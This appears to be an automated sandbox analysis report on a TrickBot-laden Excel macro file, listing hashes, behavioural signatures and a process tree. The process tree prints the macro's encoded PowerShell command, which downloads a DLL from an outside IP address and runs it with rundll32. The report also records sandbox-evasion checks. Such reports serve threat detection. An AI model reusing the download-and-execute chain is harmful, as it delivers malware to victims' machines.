Analysis
max time kernel: 129s
max time network: 139s
platform: windows10_x64
resource: win10-en-20211014
submitted: 14-10-2021 18:06
Static task: static1
Behavioral task: behavioral1
Sample: doc2_5.xlsm
Resource: win7-en-20210920
General
Target: doc2_5.xlsm
Size: 130KB
MD5: bb9509e3a758f80aba854fbf3f1fb7be
SHA1: 45389b76ed4ad5d41205b754775de4f9f3fd1076
SHA256: 6cdc36e5c8774b62bbeeaa2141af5fd3c9c5ca33e0197e6301f76f23e59e9e22
SHA512: c11c2e545ca8d092c772a8d2bda01bb82be89b81f2ac3c0d2e478972b5606ed8405fc350d993434cd4023b4ff958dd83e470f89d3726a144de766ba5cbc550e7
Malware Config
Extracted
trickbot
100019
sof1
autorunName:pwgrabbName:pwgrabc
Signatures
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
description: Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process; pid: 3116; pid_target: 1500; Process: cmd.exe; procid_target: 68

Blocklisted process makes network request (1 IoC)
flow: 30; pid: 832; Process: powershell.exe

Downloads MZ/PE file

Loads dropped DLL (1 IoC)
pid: 1780; Process: rundll32.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
description: Key opened; ioc: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0; Process: EXCEL.EXE
description: Key value queried; ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz; Process: EXCEL.EXE
description: Key value queried; ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString; Process: EXCEL.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
description: Key opened; ioc: \REGISTRY\MACHINE\Hardware\Description\System\BIOS; Process: EXCEL.EXE
description: Key value queried; ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily; Process: EXCEL.EXE
description: Key value queried; ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU; Process: EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoC)
pid: 1500; Process: EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (3 IoCs)
pid: 832; Process: powershell.exe (3 identical entries)

Suspicious use of AdjustPrivilegeToken (2 IoCs)
description: Token: SeDebugPrivilege; pid: 832; Process: powershell.exe
description: Token: SeDebugPrivilege; pid: 1140; Process: wermgr.exe

Suspicious use of SetWindowsHookEx (12 IoCs)
pid: 1500; Process: EXCEL.EXE (12 identical entries)

Suspicious use of WriteProcessMemory (16 IoCs)
description: PID 1500 wrote to memory of 3116; pid: 1500; Process: EXCEL.EXE; procid_target: 72 (2 entries)
description: PID 3116 wrote to memory of 832; pid: 3116; Process: cmd.exe; procid_target: 74 (2 entries)
description: PID 3116 wrote to memory of 3936; pid: 3116; Process: cmd.exe; procid_target: 75 (2 entries)
description: PID 3936 wrote to memory of 1780; pid: 3936; Process: rundll32.exe; procid_target: 76 (3 entries)
description: PID 1780 wrote to memory of 4020; pid: 1780; Process: rundll32.exe; procid_target: 77 (3 entries)
description: PID 1780 wrote to memory of 1140; pid: 1780; Process: rundll32.exe; procid_target: 78 (4 entries)
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\doc2_5.xlsm"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID: 1500

  C:\Windows\System32\cmd.exe
    Command: "C:\Windows\System32\cmd.exe" /c start /B /MIN /WAIT powershell -enc IABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvADEAOQA1AC4AMQAzADMALgAxADkAMgAuADEAMAAxAC8AaQBtAGEAZwBlAHMALwByAGUAZABwAGwAYQBuAGUALgBwAG4AZwAiACAALQBPAHUAdABGAGkAbABlACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYgAuAGQAbABsACIA & start C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,gigi
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    PID: 3116

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command: powershell -enc IABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvADEAOQA1AC4AMQAzADMALgAxADkAMgAuADEAMAAxAC8AaQBtAGEAZwBlAHMALwByAGUAZABwAGwAYQBuAGUALgBwAG4AZwAiACAALQBPAHUAdABGAGkAbABlACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYgAuAGQAbABsACIA
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 832

    C:\Windows\System32\rundll32.exe
      Command: C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,gigi
      - Suspicious use of WriteProcessMemory
      PID: 3936

      C:\Windows\SysWOW64\rundll32.exe
        Command: C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,gigi
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        PID: 1780

        C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe
          PID: 4020

        C:\Windows\system32\wermgr.exe
          Command: C:\Windows\system32\wermgr.exe
          - Suspicious use of AdjustPrivilegeToken
          PID: 1140